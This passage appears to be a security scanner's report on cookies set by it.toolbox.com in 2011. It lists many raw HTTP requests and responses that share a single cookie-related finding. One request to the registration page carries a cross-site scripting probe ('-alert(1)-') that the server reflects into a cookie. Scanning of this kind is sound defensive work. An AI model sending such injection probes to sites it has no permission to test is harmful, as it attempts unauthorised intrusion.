HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 274 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 26 Jan 2011 14:52:01 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 25 Feb 2011 14:52:01 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296053521.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 25-Jan-2013 14:47:11 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 26 Jan 2011 14:52:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 26 Jan 2011 14:52:01 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68764 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Change Orig ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67441 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Does John S ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73174 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Dx3: Data D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70278 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Elementary ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72957 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> It Starts W ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72699 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Key Success ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68279 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Life Cycles ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Making The ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66943 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Micracle Fr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67827 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Plowing Sid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73552 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Roadmap Pro ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66827 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SaaS marche ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85703 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Talent Curv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 75502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Technical D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69302 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Check B ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68773 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Emergen ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69404 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Wocket ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68626 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Two Old Pal ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66046 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Venture and ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81197 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=-&st=-&ct=-&pc=-&lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Why Should ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&opi_o=5 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 39817 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: joinedfrom=title=Future States&url=http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&origin=5; domain=.toolbox.com; expires=Wed, 09-Feb-2011 14:47:17 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Register wi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jobs/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
